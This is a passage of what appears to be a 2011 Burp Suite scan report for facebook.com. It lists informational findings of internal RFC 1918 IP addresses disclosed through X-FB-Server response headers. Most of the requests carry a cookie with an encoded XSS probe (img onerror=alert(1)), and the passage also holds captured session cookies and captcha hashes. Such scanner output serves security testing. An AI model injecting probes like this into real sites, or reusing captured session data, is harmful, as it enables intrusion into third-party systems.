Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

20.27. http://www.facebook.com/ajax/intl/language_dialog.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/ajax/intl/language_dialog.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.168.31

Request

Response

20.28. http://www.facebook.com/ajax/reg_birthday_help.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/ajax/reg_birthday_help.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.163.55

Request

Response

20.29. http://www.facebook.com/ajax/register/logging.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/ajax/register/logging.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.198.51

Request

Response

20.30. http://www.facebook.com/aol previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/aol

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.187.63

Request

Response

20.31. http://www.facebook.com/aolradio previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/aolradio

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.190.33

Request

Response

20.32. http://www.facebook.com/badges previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/badges

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.157.31

Request

GET /badges?ref=pf HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/badges/?ref=pf
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.157.31
Connection: close
Date: Thu, 05 May 2011 11:42:57 GMT
Content-Length: 0

20.33. http://www.facebook.com/badges previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/badges

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.198.51

Request

GET /badges HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/badges/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.198.51
Connection: close
Date: Thu, 05 May 2011 11:42:55 GMT
Content-Length: 0

20.34. http://www.facebook.com/badges previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/badges

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.222.119

Request

Response

20.35. http://www.facebook.com/burkerkink previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/burkerkink

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.190.63

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fburkerkink; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.190.63
Connection: close
Date: Thu, 05 May 2011 11:42:28 GMT
Content-Length: 42388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

20.36. http://www.facebook.com/campaign/landing.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/campaign/landing.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.136.41

Request

GET /campaign/landing.php?placement=pflo&campaign_id=402047449186&extra_1=auto HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 302 Found
Location: http://www.facebook.com/advertising/?campaign_id=402047449186&placement=pflo&extra_1=0
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; expires=Sat, 04-Jun-2011 11:42:08 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.136.41
Connection: close
Date: Thu, 05 May 2011 11:42:08 GMT
Content-Length: 0

20.37. http://www.facebook.com/campaign/landing.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/campaign/landing.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.140.63

Request

GET /campaign/landing.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 302 Found
Location: http://www.facebook.com/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: campaign_click_url=%2Fcampaign%2Flanding.php; expires=Sat, 04-Jun-2011 11:42:06 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.140.63
Connection: close
Date: Thu, 05 May 2011 11:42:06 GMT
Content-Length: 0

20.38. http://www.facebook.com/campaign/landing.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/campaign/landing.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.222.101

Request

Response

20.39. http://www.facebook.com/campaign/landing.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/campaign/landing.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.191.29

Request

GET /campaign/landing.php?campaign_id=137675572948107&partner_id=mmafighting.com&placement=like_button&extra_1=http%3A%2F%2Fwww.mmafighting.com%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545&extra_2=US HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 302 Found
Location: http://www.facebook.com/r.php
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dmmafighting.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.mmafighting.com%252F2011%252F05%252F04%252Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%252F%253Ficid%253Dmaing-grid7%25257Cmain5%25257Cdl4%25257Csec3_lnk1%25257C60545%26extra_2%3DUS; expires=Sat, 04-Jun-2011 11:42:07 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.191.29
Connection: close
Date: Thu, 05 May 2011 11:42:07 GMT
Content-Length: 0

20.40. http://www.facebook.com/captcha/tfbimage.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/captcha/tfbimage.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.150.47

Request

GET /captcha/tfbimage.php?captcha_challenge_code=1304595614-beb186772f3d2620ad11f4586c5a18de&captcha_challenge_hash=AQDpkvzgEX8WUTIHyTCa1yvyR68iRvEwWFZCisUT48b64XkuINY-m3bVb4o3XhY-o1xwV29Et4FT5RvwZsH1rj7jRc7b1ZcIAZZxguGR9VIvE4X65RN8Vcv9Tg267ex-l6aIs0vgwbAwe6V1WKUnHFDdqkF786F_T7EgrDK_qtGuKE8VfWiuNItVb5RgkjdlzXnaE7FY94Vb-Wh3MdlKiL6XrhVUF0t8V1c3dSLOKzwNv3bY2G3_cjCdS88nth9gaWTToOgZyK38VcRqxNEOyuZLVxL0Ye_CehWSFsUusAbT44Swrq8oSuNyvIydXPv-g6NaVZiYRqKMpomLBTm_LxACbOVncr9iYoHbn4EjPHyqWJqftPi3r9XsdPPJ1392n4BlmSRE84EdWEYWn3e9mwIHSHQ0vvvLLaBmvUsnhowTgLUaMyKhm1LzQylP7MW51wDoO-ZjkzyR6vDb2vLn6AdEhgr7AT_yrFs8v1OuAADEkWkFd7yt0IimytjD65PNFuwWJVFy0Xi0AK_crrrwkHIOJgMJ4VP9QTMJj0eRd9k3MJRhJqqeC8pl7YCzMoPhmtxFjXB0voIB7VBBLRsjiHKj HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/r.php?profile_id=100000824820783&next=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D100000824820783
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783

Response

HTTP/1.1 302 Found
Location: http://www.facebook.com/login.php?next=http%3A%2F%2Fwww.facebook.com%2Fcaptcha%2Ftfbimage.php%3Fcaptcha_challenge_code%3D1304595614-beb186772f3d2620ad11f4586c5a18de%26captcha_challenge_hash%3DAQDpkvzgEX8WUTIHyTCa1yvyR68iRvEwWFZCisUT48b64XkuINY-m3bVb4o3XhY-o1xwV29Et4FT5RvwZsH1rj7jRc7b1ZcIAZZxguGR9VIvE4X65RN8Vcv9Tg267ex-l6aIs0vgwbAwe6V1WKUnHFDdqkF786F_T7EgrDK_qtGuKE8VfWiuNItVb5RgkjdlzXnaE7FY94Vb-Wh3MdlKiL6XrhVUF0t8V1c3dSLOKzwNv3bY2G3_cjCdS88nth9gaWTToOgZyK38VcRqxNEOyuZLVxL0Ye_CehWSFsUusAbT44Swrq8oSuNyvIydXPv-g6NaVZiYRqKMpomLBTm_LxACbOVncr9iYoHbn4EjPHyqWJqftPi3r9XsdPPJ1392n4BlmSRE84EdWEYWn3e9mwIHSHQ0vvvLLaBmvUsnhowTgLUaMyKhm1LzQylP7MW51wDoO-ZjkzyR6vDb2vLn6AdEhgr7AT_yrFs8v1OuAADEkWkFd7yt0IimytjD65PNFuwWJVFy0Xi0AK_crrrwkHIOJgMJ4VP9QTMJj0eRd9k3MJRhJqqeC8pl7YCzMoPhmtxFjXB0voIB7VBBLRsjiHKj
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.150.47
X-Cnection: close
Date: Thu, 05 May 2011 11:43:19 GMT
Content-Length: 0

20.41. http://www.facebook.com/captcha/tfbimage.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/captcha/tfbimage.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.105.41

Request

GET /captcha/tfbimage.php?captcha_challenge_code=1304595626-d21de79035fc3bf09f7c11031428e954&captcha_challenge_hash=AQBmVlbjrUuFViWTOgtdaVHgaLtmyZm4oVGEKfzQBSt9EM1cVPpjHEUe-LybObuM23ufiIddLwkHgirN5Hmnt3GBelvEpbnsC6Sry-bQ861Q2VOktAdF2F7oqlVDLmu3fqn-Ui6RVj8ax4y9WHYaDGs8GsKl5X-5jjjHUUa40iHuoLvfmjLaq3QiYquL1eMP1p0wYlcikNNowa-6yKbTUm771cnDH4aQGpV3Pz01TukuamozVLneeDEarkzux5xcQZ2flgaBIa_gnbjK5WctMSz4FIKRrLgnhNAEz7mya6VcJCiR7L8TG3HFMjlM3xc0fo5QLspwIFeeHl-eWiAtt-bnYx3XA8kzbkEl2pw-UqltVt5SyL2CapxhsQZGraiOXUnGnr-snj0hmBTOrFmnYNjtKig8dzy8NsD0dLhsaUOPfxN5l_O3dbZ75rwkOBV6pF5rZbQcJrzuUtDd9UBMDkaHSHs7qLsO0pomrcv-vyF57MeA5ixPA3Z6I3x8SvkX68XQz-x8yLU8PH6ovOu4vbhfCeVrNNdr1Zm0zfCaK1oPNZVz2vjiloWG-oGc9mGWWJN7i_IoGH6ItljA3DnMvr6x HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/r.php?profile_id=100000824820783&next=http%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D100000824820783
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; act=1304613620616%2F2; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpolicy.php

Response

HTTP/1.1 302 Found
Location: http://www.facebook.com/login.php?next=http%3A%2F%2Fwww.facebook.com%2Fcaptcha%2Ftfbimage.php%3Fcaptcha_challenge_code%3D1304595626-d21de79035fc3bf09f7c11031428e954%26captcha_challenge_hash%3DAQBmVlbjrUuFViWTOgtdaVHgaLtmyZm4oVGEKfzQBSt9EM1cVPpjHEUe-LybObuM23ufiIddLwkHgirN5Hmnt3GBelvEpbnsC6Sry-bQ861Q2VOktAdF2F7oqlVDLmu3fqn-Ui6RVj8ax4y9WHYaDGs8GsKl5X-5jjjHUUa40iHuoLvfmjLaq3QiYquL1eMP1p0wYlcikNNowa-6yKbTUm771cnDH4aQGpV3Pz01TukuamozVLneeDEarkzux5xcQZ2flgaBIa_gnbjK5WctMSz4FIKRrLgnhNAEz7mya6VcJCiR7L8TG3HFMjlM3xc0fo5QLspwIFeeHl-eWiAtt-bnYx3XA8kzbkEl2pw-UqltVt5SyL2CapxhsQZGraiOXUnGnr-snj0hmBTOrFmnYNjtKig8dzy8NsD0dLhsaUOPfxN5l_O3dbZ75rwkOBV6pF5rZbQcJrzuUtDd9UBMDkaHSHs7qLsO0pomrcv-vyF57MeA5ixPA3Z6I3x8SvkX68XQz-x8yLU8PH6ovOu4vbhfCeVrNNdr1Zm0zfCaK1oPNZVz2vjiloWG-oGc9mGWWJN7i_IoGH6ItljA3DnMvr6x
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.105.41
X-Cnection: close
Date: Thu, 05 May 2011 11:43:33 GMT
Content-Length: 0

20.42. http://www.facebook.com/careers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/careers/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.151.69

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.151.69
Connection: close
Date: Thu, 05 May 2011 11:43:02 GMT
Content-Length: 20523

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.43. http://www.facebook.com/careers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/careers/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.154.53

Request

GET /careers/ HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.154.53
Connection: close
Date: Thu, 05 May 2011 11:42:59 GMT
Content-Length: 20487

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.44. http://www.facebook.com/careers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/careers/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.222.122

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-Powered-By: HPHP
X-FB-Server: 10.32.222.122
Connection: close
Date: Thu, 05 May 2011 10:56:36 GMT
Content-Length: 20487

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.45. http://www.facebook.com/deedee.perez1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/deedee.perez1

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.165.57

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdeedee.perez1; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.165.57
Connection: close
Date: Thu, 05 May 2011 11:42:21 GMT
Content-Length: 77523

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

20.46. http://www.facebook.com/directory/pages/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/directory/pages/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.155.51

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpages%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.155.51
Connection: close
Date: Thu, 05 May 2011 11:42:59 GMT
Content-Length: 44671

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.47. http://www.facebook.com/directory/people/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/directory/people/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.146.25

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpeople%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.146.25
Connection: close
Date: Thu, 05 May 2011 11:42:57 GMT
Content-Length: 34484

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

20.48. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.146.37

Request

